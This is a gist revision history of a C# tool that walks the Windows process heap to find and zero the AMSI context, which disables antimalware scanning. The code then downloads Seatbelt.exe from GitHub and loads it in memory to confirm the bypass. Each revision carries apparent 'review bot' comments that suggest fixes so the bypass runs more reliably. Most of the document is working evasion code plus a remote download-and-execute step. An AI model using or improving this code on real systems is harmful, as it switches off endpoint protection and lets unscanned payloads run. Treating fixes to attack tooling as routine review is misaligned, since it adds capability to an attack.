Revisions
wavvs revised this gist
Jan 20, 2022 . 1 changed file with 2 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -103,8 +103,8 @@ static void Main(string[] args) var addr = Marshal.ReadIntPtr(h.lpData, IntPtr.Size); if (addr == appNameAddr) { hContextAddr = h.lpData; Console.WriteLine("[*] Found HAMSICONTEXT address: 0x{0}", hContextAddr.ToString("X")); break; } } -
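Review bot: The block now stored as the context (`hContextAddr = h.lpData;`) is identified only by its second pointer-sized field equalling `appNameAddr`, and nothing about its size is retained, while the zeroing that follows outside this hunk writes `IntPtr.Size * 3` bytes; if the walk's guard still admits blocks of only `IntPtr.Size * 2` bytes (as in the previous revision), a minimal 16-byte match on x64 is overrun by 8 bytes into the next heap entry. Tighten the match to `if (addr == appNameAddr && h.cbData >= IntPtr.Size * 3)` so the write can never exceed the allocation that matched. A single pointer comparison is also a weak identity test for the context; an additional sanity check on the block's contents before it is overwritten would reduce the chance of zeroing an unrelated allocation that merely references the same string. Main starts and ends outside this hunk.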
wavvs revised this gist
Jan 20, 2022 . 1 changed file with 9 additions and 7 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -74,11 +74,13 @@ static void Main(string[] args) IntPtr appNameAddr = IntPtr.Zero; IntPtr hContextAddr = IntPtr.Zero; string appName = "DotNet"; while (HeapWalk(heap, ref h)) { if ((h.wFlags & PROCESS_HEAP_ENTRY_WFLAGS.PROCESS_HEAP_ENTRY_BUSY) != 0 && h.cbData >= appName.Length * 2) { if (Marshal.PtrToStringUni(h.lpData) == appName) { appNameAddr = h.lpData; Console.WriteLine("[*] Found appName: 0x{0}", appNameAddr.ToString("X")); @@ -96,9 +98,9 @@ static void Main(string[] args) h.lpData = IntPtr.Zero; while (HeapWalk(heap, ref h)) { if ((h.wFlags & PROCESS_HEAP_ENTRY_WFLAGS.PROCESS_HEAP_ENTRY_BUSY) != 0 && h.cbData >= IntPtr.Size * 2) { var addr = Marshal.ReadIntPtr(h.lpData, IntPtr.Size); if (addr == appNameAddr) { hContextAddr = appNameAddr; @@ -115,12 +117,12 @@ static void Main(string[] args) } Console.WriteLine("[*] Corrupting HAMSICONTEXT (Win 11 is supported)"); var zero = new byte[IntPtr.Size * 3]; Marshal.Copy(zero, 0, hContextAddr, IntPtr.Size * 3); Console.WriteLine("[*] Checking bypass, loading Seatbelt"); var c = new WebClient(); Assembly.Load(c.DownloadData(@"https://raw.githubusercontent.com/Flangvik/SharpCollection/master/NetFramework_4.5_Any/Seatbelt.exe")); Console.WriteLine("[*] AMSI has been successfully bypassed!"); Console.ReadLine(); -
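Review bot: `Marshal.Copy(zero, 0, hContextAddr, IntPtr.Size * 3)` writes 24 bytes on x64 to `hContextAddr`, which in this revision is assigned `appNameAddr` — a block the first walk only required to be `appName.Length * 2` (12) bytes — and the second walk's guard likewise only requires `IntPtr.Size * 2`; either way the write can run past the matched allocation and corrupt the adjacent heap entry. Require the target to be large enough at the point of the match, e.g. `if (addr == appNameAddr && h.cbData >= IntPtr.Size * 3)`, and bail out otherwise instead of writing. The bypass check on the last lines also executes `Seatbelt.exe` fetched at run time from a mutable `master` branch with no integrity check, so the tool's own self-test is a remote-code-execution point for whoever controls that path. Main starts and ends outside these hunks.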
wavvs revised this gist
Jan 20, 2022 . 1 changed file with 11 additions and 3 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -10,7 +10,7 @@ using System.IO; using System.Net; namespace AmsiBypassHeap { internal class Program { @@ -98,15 +98,22 @@ static void Main(string[] args) { if ((h.wFlags & PROCESS_HEAP_ENTRY_WFLAGS.PROCESS_HEAP_ENTRY_BUSY) != 0 && h.cbData >= 16) { var addr = Marshal.ReadIntPtr(h.lpData, 8); if (addr == appNameAddr) { hContextAddr = appNameAddr; Console.WriteLine("[*] Found HAMSICONTEXT address: 0x{0}", h.lpData.ToString("X")); break; } } } if (hContextAddr == IntPtr.Zero) { Console.WriteLine("[*] Could not find HAMSICONTEXT"); return; } Console.WriteLine("[*] Corrupting HAMSICONTEXT (Win 11 is supported)"); var zero = new byte[24]; Marshal.Copy(zero, 0, hContextAddr, 24); @@ -116,6 +123,7 @@ static void Main(string[] args) Assembly.Load(c.DownloadData(@"https://raw.githubusercontent.com/Flangvik/SharpCollection/master/NetFramework_4.7_x64/Seatbelt.exe")); Console.WriteLine("[*] AMSI has been successfully bypassed!"); Console.ReadLine(); } } } -
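Review bot: The new `if (hContextAddr == IntPtr.Zero)` guard treats every exit from the `HeapWalk` loop as "not found", but `HeapWalk` also returns false on failure, and the P/Invoke is declared with `SetLastError = true` without the error ever being read, so a walk that aborted part-way is reported as a missing context rather than as an error. Distinguish exhaustion from failure right after the loop: `var err = Marshal.GetLastWin32Error(); if (err != 259 /* ERROR_NO_MORE_ITEMS */) { Console.WriteLine("[-] HeapWalk failed: {0}", err); return; }`. Note also that `hContextAddr = appNameAddr;` stores the address of the string block while the log line prints `h.lpData` as the context address, so the message and the value later corrupted refer to different allocations. Main starts before and ends after this hunk.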
wavvs created this gist
Jan 19, 2022 .There are no files selected for viewing
@@ -0,0 +1,121 @@ using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Runtime.InteropServices; using System.Reflection; using System.Diagnostics; using System.Threading; using System.IO; using System.Net; namespace BypassExperiments { internal class Program { [Flags] public enum PROCESS_HEAP_ENTRY_WFLAGS : ushort { PROCESS_HEAP_ENTRY_BUSY = 0x0004, PROCESS_HEAP_ENTRY_DDESHARE = 0x0020, PROCESS_HEAP_ENTRY_MOVEABLE = 0x0010, PROCESS_HEAP_REGION = 0x0001, PROCESS_HEAP_UNCOMMITTED_RANGE = 0x0002, } [StructLayoutAttribute(LayoutKind.Explicit)] public struct UNION_BLOCK { [FieldOffset(0)] public STRUCT_BLOCK Block; [FieldOffset(0)] public STRUCT_REGION Region; } [StructLayoutAttribute(LayoutKind.Sequential)] public struct STRUCT_BLOCK { public IntPtr hMem; public uint dwReserved1_1; public uint dwReserved1_2; public uint dwReserved1_3; } [StructLayoutAttribute(LayoutKind.Sequential)] public struct STRUCT_REGION { public uint dwCommittedSize; public uint dwUnCommittedSize; public IntPtr lpFirstBlock; public IntPtr lpLastBlock; } [StructLayoutAttribute(LayoutKind.Sequential)] public struct PROCESS_HEAP_ENTRY { public IntPtr lpData; public uint cbData; public byte cbOverhead; public byte iRegionIndex; public PROCESS_HEAP_ENTRY_WFLAGS wFlags; public UNION_BLOCK UnionBlock; } [DllImport("kernel32.dll", SetLastError = true)] static extern IntPtr GetProcessHeap(); [DllImport("kernel32.dll", SetLastError = true)] static extern bool HeapWalk(IntPtr hHeap, ref PROCESS_HEAP_ENTRY lpEntry); static void Main(string[] args) { // Initialize AMSI Assembly.Load(File.ReadAllBytes(@"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Build.dll")); IntPtr heap = GetProcessHeap(); PROCESS_HEAP_ENTRY h = new PROCESS_HEAP_ENTRY(); IntPtr appNameAddr = IntPtr.Zero; IntPtr hContextAddr = IntPtr.Zero; while (HeapWalk(heap, ref h)) { if ((h.wFlags & PROCESS_HEAP_ENTRY_WFLAGS.PROCESS_HEAP_ENTRY_BUSY) != 0 && h.cbData 
>= 12) { if (Marshal.PtrToStringUni(h.lpData) == "DotNet") { appNameAddr = h.lpData; Console.WriteLine("[*] Found appName: 0x{0}", appNameAddr.ToString("X")); break; } } } if (appNameAddr == IntPtr.Zero) { Console.WriteLine("[*] Could not locate appName"); return; } h.lpData = IntPtr.Zero; while (HeapWalk(heap, ref h)) { if ((h.wFlags & PROCESS_HEAP_ENTRY_WFLAGS.PROCESS_HEAP_ENTRY_BUSY) != 0 && h.cbData >= 16) { hContextAddr = Marshal.ReadIntPtr(h.lpData, 8); if (hContextAddr == appNameAddr) { Console.WriteLine("[*] Found HAMSICONTEXT address: 0x{0}", h.lpData.ToString("X")); break; } } } Console.WriteLine("[*] Corrupting HAMSICONTEXT (Win 11 is supported)"); var zero = new byte[24]; Marshal.Copy(zero, 0, hContextAddr, 24); Console.WriteLine("[*] Checking bypass, loading Seatbelt"); var c = new WebClient(); Assembly.Load(c.DownloadData(@"https://raw.githubusercontent.com/Flangvik/SharpCollection/master/NetFramework_4.7_x64/Seatbelt.exe")); Console.WriteLine("[*] AMSI has been successfully bypassed!"); } } }
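Review bot: `Assembly.Load(c.DownloadData(@"https://raw.githubusercontent.com/Flangvik/SharpCollection/master/NetFramework_4.7_x64/Seatbelt.exe"))` in the bypass check executes a third-party binary fetched from a mutable branch at run time with no integrity check, so anyone who can change that repository path gets code execution inside the operator's process. Pin the artifact: load a local copy, or hash the downloaded bytes and compare against a constant before loading, e.g. `var bytes = c.DownloadData(url); if (BitConverter.ToString(SHA256.Create().ComputeHash(bytes)) != expectedSha256) { Console.WriteLine("[-] Seatbelt hash mismatch"); return; }` (needs `using System.Security.Cryptography;`). Separately, the second walk assigns `hContextAddr = Marshal.ReadIntPtr(h.lpData, 8)` on every busy block, so when nothing matches the variable is left holding the last block's pointer and `Marshal.Copy(zero, 0, hContextAddr, 24)` then zeroes 24 bytes at an arbitrary heap address; a not-found check before the write is required. The whole of Main is within this hunk.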